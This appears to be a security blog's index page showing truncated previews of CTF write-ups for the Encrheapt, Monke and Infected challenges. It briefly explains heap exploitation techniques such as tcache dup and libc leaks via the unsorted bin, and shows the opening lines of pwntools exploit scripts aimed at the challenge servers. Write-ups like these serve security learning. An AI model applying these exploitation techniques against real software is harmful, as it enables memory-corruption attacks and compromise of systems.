YYsecurity
[UDCTF 2021 | BlueHens 2021] Partial Writeup
Encrheapt
Just malloc and free, tcache dup. It's freaking easy. Just do it.
from pwn import *
#context.log_level = 'debug'
#p = process("./a.out")
p = remote("challenges.ctfd.io", 30028)
def encrypt(ch, size, con):
    p.sendlineafter('3. Exit\n', '1')
    p.sendlineafter('2)??: ', str(ch))
    p.sendlineafter(' key?:', '1')
    p.sendlineafter('How much would you like to encrypt: ', str(size))
    p.sendlineafter('W..
[UTCTF 2021] Partial Writeup
Monke
We should set can_eat to 0 to use tcache dup. When we type a char other than 'w', 'e', 's', 'n', we can set can_eat to 0. We can leak by freeing into the unsorted bin and reading the name of the banana (which has been freed). So I know libc_addr and we can get AAW by tcache dup. Let's play~
from pwn import *
p = remote("pwn.utctf.live", 9999)
elf = ELF("./monke")
libc = ELF("./libc-2.27.so")
def walk(d):
    p.sen..
[zer0pts CTF 2021] Partial Writeup
Infected
The goal of this problem is to access the /root directory. Upon extraction, the backdoor file and the pow.py file are located. First, let's analyze pow.py.
"""
i.e.
sha256("????v0iRhxH4SlrgoUd5Blu0") = b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c
Suffix: v0iRhxH4SlrgoUd5Blu0
Hash: b788094e2d021fa16f30c83346f3c80de5afab0840750a49a9254c2a73ed274c
"""
import itertools
impor..